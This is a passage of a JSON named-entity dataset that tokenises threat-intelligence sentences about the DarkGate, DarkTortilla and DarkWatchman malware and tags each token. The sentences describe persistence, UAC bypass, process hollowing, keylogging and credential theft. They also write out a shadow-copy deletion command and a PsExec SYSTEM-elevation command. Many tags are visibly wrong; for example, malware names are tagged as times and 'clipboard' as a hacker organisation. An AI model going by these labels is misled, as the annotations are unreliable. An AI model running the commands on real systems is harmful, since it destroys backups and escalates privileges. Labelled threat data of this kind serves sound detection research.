"O", "O" ] }, { "tokens": [ "DarkGate", "uses", "AutoIt", "scripts", "dropped", "to", "a", "hidden", "directory", "during", "initial", "installation", "phases,", "such", "as", "`test.au3`." ], "ner_tags": [ "B-Idus", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "DarkGate", "searches", "for", "stored", "credentials", "associated", "with", "cryptocurrency", "wallets", "and", "notifies", "the", "command", "and", "control", "server", "when", "identified." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkGate", "uses", "two", "distinct", "User", "Account", "Control", "(UAC)", "bypass", "techniques", "to", "escalate", "privileges." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkGate", "starts", "a", "thread", "on", "execution", "that", "captures", "clipboard", "data", "and", "logs", "it", "to", "a", "predefined", "log", "file." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkGate", "use", "Nirsoft", "Network", "Password", "Recovery", "or", "NetPass", "tools", "to", "steal", "stored", "RDP", "credentials", "in", "some", "malware", "versions." ], "ner_tags": [ "B-Idus", "O", "B-Way", "B-Tool", "O", "O", "O", "B-Way", "B-Tool", "O", "I-Purp", "I-Purp", "B-Tool", "B-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "DarkGate", "includes", "one", "infection", "vector", "that", "leverages", "a", "malicious", "\"KeyScramblerE.DLL\"", "library", "that", "will", "load", "during", "the", "execution", "of", "the", "legitimate", "KeyScrambler", "application." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "DarkGate", "can", "cloak", "command", "and", "control", "traffic", "in", "DNS", "records", "from", "legitimate", "services", "to", "avoid", "reputation-based", "detection", "techniques." ], "ner_tags": [ "B-Idus", "O", "I-Way", "I-Way", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkGate", "can", "deploy", "follow-on", "ransomware", "payloads." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkGate", "will", "retrieved", "encrypted", "commands", "from", "its", "command", "and", "control", "server", "for", "follow-on", "actions", "such", "as", "cryptocurrency", "mining." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkGate", "checks", "the", "<code>BeingDebugged</code>", "flag", "in", "the", "PEB", "structure", "during", "execution", "to", "identify", "if", "the", "malware", "is", "being", "debugged." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkGate", "installation", "includes", "binary", "code", "stored", "in", "a", "file", "located", "in", "a", "hidden", "directory,", "such", "as", "<code>shell.txt</code>,", "that", "is", "decrypted", "then", "executed.", "DarkGate", "uses", "hexadecimal-encoded", "shellcode", "payloads", "during", "installation", "that", "are", "called", "via", "Windows", "API", "<code>CallWindowProc()</code>", "to", "decode", "and", "then", "execute." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkGate", "will", "terminate", "processes", "associated", "with", "several", "security", "software", "products", "if", "identified", "during", "execution." ], "ner_tags": [ "B-Idus", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkGate", "command", "and", "control", "includes", "hard-coded", "domains", "in", "the", "malware", "chosen", "to", "masquerade", "as", "legitimate", "services", "such", "as", "Akamai", "CDN", "or", "Amazon", "Web", "Services." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "DarkGate", "masquerades", "malicious", "LNK", "files", "as", "PDF", "objects", "using", "the", "double", "extension", "<code>.pdf.lnk</code>." ], "ner_tags": [ "B-Idus", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "DarkGate", "drops", "an", "encrypted", "PE", "file,", "pe.bin,", "and", "decrypts", "it", "during", "installation.", "DarkGate", "also", "uses", "custom", "base64", "encoding", "schemas", "in", "later", "variations", "to", "obfuscate", "payloads." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "B-Tool", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkGate", "uses", "per-victim", "links", "for", "hosting", "malicious", "archives,", "such", "as", "ZIP", "files,", "in", "services", "such", "as", "SharePoint", "to", "prevent", "other", "entities", "from", "retrieving", "them." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkGate", "uses", "existing", "command", "and", "control", "channels", "to", "retrieve", "captured", "cryptocurrency", "wallet", "credentials." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Some", "versions", "of", "DarkGate", "search", "for", "the", "hard-coded", "folder", "<code>C:\\Program", "Files\\e", "Carte", "Bleue</code>." ], "ner_tags": [ "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkGate", "can", "deploy", "payloads", "capable", "of", "capturing", "credentials", "related", "to", "cryptocurrency", "wallets." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "DarkGate", "initial", "installation", "involves", "dropping", "several", "files", "to", "a", "hidden", "directory", "named", "after", "the", "victim", "machine", "name." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkGate", "command", "and", "control", "includes", "hard-coded", "domains", "in", "the", "malware", "masquerading", "as", "legitimate", "services", "such", "as", "Akamai", "CDN", "or", "Amazon", "Web", "Services." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "B-Tool", "O", "B-Tool" ] }, { "tokens": [ "DarkGate", "edits", "the", "Registry", "key", "<code>HKCU\\Software\\Classes\\mscfile\\shell\\open\\command</code>", "to", "execute", "a", "malicious", "AutoIt", "script.", "When", "eventvwr.exe", "is", "executed,", "this", "will", "call", "the", "Microsoft", "Management", "Console", "(mmc.exe),", "which", "in", "turn", "references", "the", "modified", "Registry", "key." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkGate", "retrieves", "cryptocurrency", "mining", "payloads", "and", "commands", "in", "encrypted", "traffic", "from", "its", "command", "and", "control", "server.", "DarkGate", "uses", "Windows", "Batch", "scripts", "executing", "the", "<code>curl</code>", "command", "to", "retrieve", "follow-on", "payloads." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkGate", "can", "delete", "system", "restore", "points", "through", "the", "command", "<code>cmd.exe", "/c", "vssadmin", "delete", "shadows", "/for=c:", "/all", "/quiet”</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkGate", "will", "spawn", "a", "thread", "on", "execution", "to", "capture", "all", "keyboard", "events", "and", "write", "them", "to", "a", "predefined", "log", "file." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkGate", "creates", "a", "local", "user", "account,", "<code>SafeMode</code>,", "via", "<code>net", "user</code>", "commands." ], "ner_tags": [ "B-Idus", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkGate", "initial", "infection", "payloads", "can", "masquerade", "as", "pirated", "media", "content", "requiring", "user", "interaction", "for", "code", "execution.", "DarkGate", "is", "distributed", "through", "phishing", "links", "to", "VBS", "or", "MSI", "objects", "requiring", "user", "interaction", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkGate", "can", "masquerade", "as", "pirated", "media", "content", "for", "initial", "delivery", "to", "victims." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkGate", "uses", "the", "native", "Windows", "API", "<code>CallWindowProc()</code>", "to", "decode", "and", "launch", "encoded", "shellcode", "payloads", "during", "execution.", "DarkGate", "can", "call", "kernel", "mode", "functions", "directly", "to", "hide", "the", "use", "of", "process", "hollowing", "methods", "during", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Tool", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkGate", "uses", "a", "hard-coded", "string", "as", "a", "seed,", "along", "with", "the", "victim", "machine", "hardware", "identifier", "and", "input", "text,", "to", "generate", "a", "unique", "string", "used", "as", "an", "internal", "mutex", "value", "to", "evade", "static", "detection", "based", "on", "mutexes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkGate", "relies", "on", "parent", "PID", "spoofing", "as", "part", "of", "its", "\"rootkit-like\"", "functionality", "to", "evade", "detection", "via", "Task", "Manager", "or", "Process", "Explorer." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkGate", "overrides", "the", "<code>%windir%</code>", "environment", "variable", "by", "setting", "a", "Registry", "key,", "<code>HKEY_CURRENT_User\\Environment\\windir</code>,", "to", "an", "alternate", "command", "to", "execute", "a", "malicious", "AutoIt", "script.", "This", "allows", "DarkGate", "to", "run", "every", "time", "the", "scheduled", "task", "<code>DiskCleanup</code>", "is", "executed", "as", "this", "uses", "the", "path", "value", "<code>%windir%\\system32\\cleanmgr.exe</code>", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkGate", "performs", "various", "checks", "for", "running", "processes,", "including", "security", "software", "by", "looking", "for", "hard-coded", "process", "name", "values." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkGate", "leverages", "process", "hollowing", "techniques", "to", "evade", "detection,", "such", "as", "decrypting", "the", "content", "of", "an", "encrypted", "PE", "file", "and", "injecting", "it", "into", "the", "process", "vbc.exe." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "DarkGate", "installation", "includes", "AutoIt", "script", "execution", "creating", "a", "shortcut", "to", "itself", "as", "an", "LNK", "object,", "such", "as", "bill.lnk,", "in", "the", "victim", "startup", "folder.", "DarkGate", "installation", "finishes", "with", "the", "creation", "of", "a", "registry", "Run", "key." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "O", "B-Features", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkGate", "executes", "a", "Windows", "Batch", "script", "during", "installation", "that", "creases", "a", "randomly-named", "directory", "in", "the", "<code>C:\\\\</code>", "root", "directory", "that", "copies", "and", "renames", "the", "legitimate", "Windows", "<curl>curl</code>", "command", "to", "this", "new", "location." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkGate", "can", "deploy", "follow-on", "cryptocurrency", "mining", "payloads." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkGate", "looks", "for", "various", "security", "products", "by", "process", "name", "using", "hard-coded", "values", "in", "the", "malware.", "DarkGate", "will", "not", "execute", "its", "keylogging", "thread", "if", "a", "process", "name", "associated", "with", "Trend", "Micro", "anti-virus", "is", "identified,", "or", "if", "runtime", "checks", "identify", "the", "presence", "of", "Kaspersky", "anti-virus.", "DarkGate", "will", "initiate", "a", "new", "thread", "if", "certain", "security", "products", "are", "identified", "on", "the", "victim,", "and", "recreate", "any", "malicious", "files", "associated", "with", "it", "if", "it", "determines", "they", "were", "removed", "by", "security", "software", "in", "a", "new", "system", "location." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Time", "B-SecTeam", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Time", "B-SecTeam", "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkGate", "tries", "to", "elevate", "privileges", "to", "<code>SYSTEM</code>", "using", "PsExec", "to", "locally", "execute", "as", "a", "service,", "such", "as", "<code>cmd", "/c", "c:\\temp\\PsExec.exe", "-accepteula", "-j", "-d", "-s", "[Target", "Binary]</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkGate", "can", "be", "distributed", "through", "emails", "with", "malicious", "attachments", "from", "a", "spoofed", "email", "address." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkGate", "is", "distributed", "in", "phishing", "emails", "containing", "links", "to", "distribute", "malicious", "VBS", "or", "MSI", "files.", "DarkGate", "uses", "applications", "such", "as", "Microsoft", "Teams", "for", "distributing", "links", "to", "payloads." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "DarkGate", "queries", "system", "resources", "on", "an", "infected", "machine", "to", "identify", "if", "it", "is", "executing", "in", "a", "sandbox", "or", "virtualized", "environment." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkGate", "uses", "the", "Delphi", "methods", "<code>Sysutils::DiskSize</code>", "and", "<code>GlobalMemoryStatusEx</code>", "to", "collect", "disk", "size", "and", "physical", "memory", "as", "part", "of", "the", "malware's", "anti-analysis", "checks", "for", "running", "in", "a", "virtualized", "environment.", "DarkGate", "will", "gather", "various", "system", "information", "such", "as", "display", "adapter", "description,", "operating", "system", "type", "and", "version,", "processor", "type,", "and", "RAM", "amount." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkGate", "queries", "system", "locale", "information", "during", "execution.", "Later", "versions", "of", "DarkGate", "query", "<code>GetSystemDefaultLCID</code>", "for", "locale", "information", "to", "determine", "if", "the", "malware", "is", "executing", "in", "Russian-speaking", "countries." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Area", "O" ] }, { "tokens": [ "DarkGate", "creates", "a", "log", "file", "for", "capturing", "keylogging,", "clipboard,", "and", "related", "data", "using", "the", "victim", "host's", "current", "date", "for", "the", "filename.", "DarkGate", "queries", "victim", "system", "epoch", "time", "during", "execution.", "DarkGate", "captures", "system", "time", "information", "as", "part", "of", "automated", "profiling", "on", "initial", "installation." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "B-HackOrg", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-Time", "O", "O", "O", "O", "O", "O", "O", "B-Time", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkGate", "uses", "NirSoft", "tools", "to", "steal", "user", "credentials", "from", "the", "infected", "machine.", "NirSoft", "tools", "are", "executed", "via", "process", "hollowing", "in", "a", "newly-created", "instance", "of", "vbc.exe", "or", "regasm.exe." ], "ner_tags": [ "B-Idus", "O", "B-Way", "B-Tool", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "DarkGate", "initial", "infection", "mechanisms", "include", "masquerading", "as", "pirated", "media", "that", "launches", "malicious", "VBScript", "on", "the", "victim." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Idus", "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkGate", "uses", "a", "malicious", "Windows", "Batch", "script", "to", "run", "the", "Windows", "<code>code</code>", "utility", "to", "retrieve", "follow-on", "script", "payloads." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkTortilla", "can", "detect", "profilers", "by", "verifying", "the", "`COR_ENABLE_PROFILING`", "environment", "variable", "is", "present", "and", "active." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkTortilla", "can", "download", "a", "clipboard", "information", "stealer", "module." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkTortilla", "has", "used", "the", "`WshShortcut`", "COM", "object", "to", "create", "a", ".lnk", "shortcut", "file", "in", "the", "Windows", "startup", "folder." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkTortilla", "can", "detect", "debuggers", "by", "using", "functions", "such", "as", "`DebuggerIsAttached`", "and", "`DebuggerIsLogging`.", "DarkTortilla", "can", "also", "detect", "profilers", "by", "verifying", "the", "`COR_ENABLE_PROFILING`", "environment", "variable", "is", "present", "and", "active." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkTortilla", "can", "decrypt", "its", "payload", "and", "associated", "configuration", "elements", "using", "the", "Rijndael", "cipher." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "DarkTortilla", "can", "use", "a", ".NET-based", "DLL", "named", "`RunPe6`", "for", "process", "injection." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkTortilla", "has", "used", "`%HiddenReg%`", "and", "`%HiddenKey%`", "as", "part", "of", "its", "persistence", "via", "the", "Windows", "registry." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkTortilla", "can", "download", "additional", "packages", "for", "keylogging,", "cryptocurrency", "mining,", "and", "other", "capabilities;", "it", "can", "also", "retrieve", "malicious", "payloads", "such", "as", "Agent", "Tesla,", "AsyncRat,", "NanoCore,", "RedLine,", "Cobalt", "Strike,", "and", "Metasploit." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "O", "B-Way", "B-Way", "B-Way", "B-Way", "B-Tool", "O", "B-Way" ] }, { "tokens": [ "DarkTortilla", "can", "check", "for", "internet", "connectivity", "by", "issuing", "HTTP", "GET", "requests." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkTortilla", "can", "download", "a", "keylogging", "module." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkTortilla", "has", "relied", "on", "a", "user", "to", "open", "a", "malicious", "document", "or", "archived", "file", "delivered", "via", "email", "for", "initial", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "DarkTortilla's", "payload", "has", "been", "renamed", "`PowerShellInfo.exe`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "DarkTortilla", "has", "modified", "registry", "keys", "for", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkTortilla", "can", "use", "a", "variety", "of", "API", "calls", "for", "persistence", "and", "defense", "evasion." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Purp" ] }, { "tokens": [ "DarkTortilla", "has", "been", "obfuscated", "with", "the", "DeepSea", ".NET", "and", "ConfuserEx", "code", "obfuscators." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "DarkTortilla", "can", "enumerate", "a", "list", "of", "running", "processes", "on", "a", "compromised", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkTortilla", "has", "established", "persistence", "via", "the", "`Software\\Microsoft\\Windows", "NT\\CurrentVersion\\Run`", "registry", "key", "and", "by", "creating", "a", ".lnk", "shortcut", "file", "in", "the", "Windows", "startup", "folder." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SecTeam", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkTortilla", "can", "check", "for", "the", "Kaspersky", "Anti-Virus", "suite." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Time", "B-SecTeam", "O" ] }, { "tokens": [ "DarkTortilla", "has", "been", "distributed", "via", "spearphishing", "emails", "containing", "archive", "attachments,", "with", "file", "types", "such", "as", ".iso,", ".zip,", ".img,", ".dmg,", "and", ".tar,", "as", "well", "as", "through", "malicious", "documents." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkTortilla", "can", "search", "a", "compromised", "system's", "running", "processes", "and", "services", "to", "detect", "Hyper-V,", "QEMU,", "Virtual", "PC,", "Virtual", "Box,", "and", "VMware,", "as", "well", "as", "Sandboxie." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Idus", "I-Tool", "O", "I-Tool", "O", "O", "B-Way", "O", "O", "O", "B-Way" ] }, { "tokens": [ "DarkTortilla", "can", "obtain", "system", "information", "by", "querying", "the", "`Win32_ComputerSystem`,", "`Win32_BIOS`,", "`Win32_MotherboardDevice`,", "`Win32_PnPEntity`,", "and", "`Win32_DiskDrive`", "WMI", "objects." ], "ner_tags": [ "B-SamFile", "O", "O", "I-Features", "I-Features", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "DarkTortilla", "can", "retrieve", "information", "about", "a", "compromised", "system's", "running", "services." ], "ner_tags": [ "B-Idus", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkTortilla", "can", "implement", "the", "`kernel32.dll`", "Sleep", "function", "to", "delay", "execution", "for", "up", "to", "300", "seconds", "before", "implementing", "persistence", "or", "processing", "an", "addon", "package." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkTortilla", "has", "used", "HTTP", "and", "HTTPS", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "B-Way", "O", "O" ] }, { "tokens": [ "DarkTortilla", "can", "retrieve", "its", "primary", "payload", "from", "public", "sites", "such", "as", "Pastebin", "and", "Textbin." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "DarkTortilla", "can", "use", "`cmd.exe`", "to", "add", "registry", "keys", "for", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkTortilla", "can", "use", "WMI", "queries", "to", "obtain", "system", "information." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkTortilla", "has", "established", "persistence", "via", "the", "`Software\\Microsoft\\Windows", "NT\\CurrentVersion\\Winlogon`", "registry", "key." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkWatchman", "reports", "window", "names", "along", "with", "keylogger", "information", "to", "provide", "application", "context." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkWatchman", "can", "use", "TLS", "to", "encrypt", "its", "C2", "channel." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkWatchman", "can", "retrieve", "browser", "history." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O" ] }, { "tokens": [ "DarkWatchman", "has", "used", "Base64", "to", "encode", "PowerShell", "commands." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "DarkWatchman", "has", "used", "the", "<code>csc.exe</code>", "tool", "to", "compile", "a", "C#", "executable." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkWatchman", "can", "collect", "files", "from", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "DarkWatchman", "has", "the", "ability", "to", "self-extract", "as", "a", "RAR", "archive." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkWatchman", "has", "used", "a", "DGA", "to", "generate", "a", "domain", "name", "for", "C2." ], "ner_tags": [ 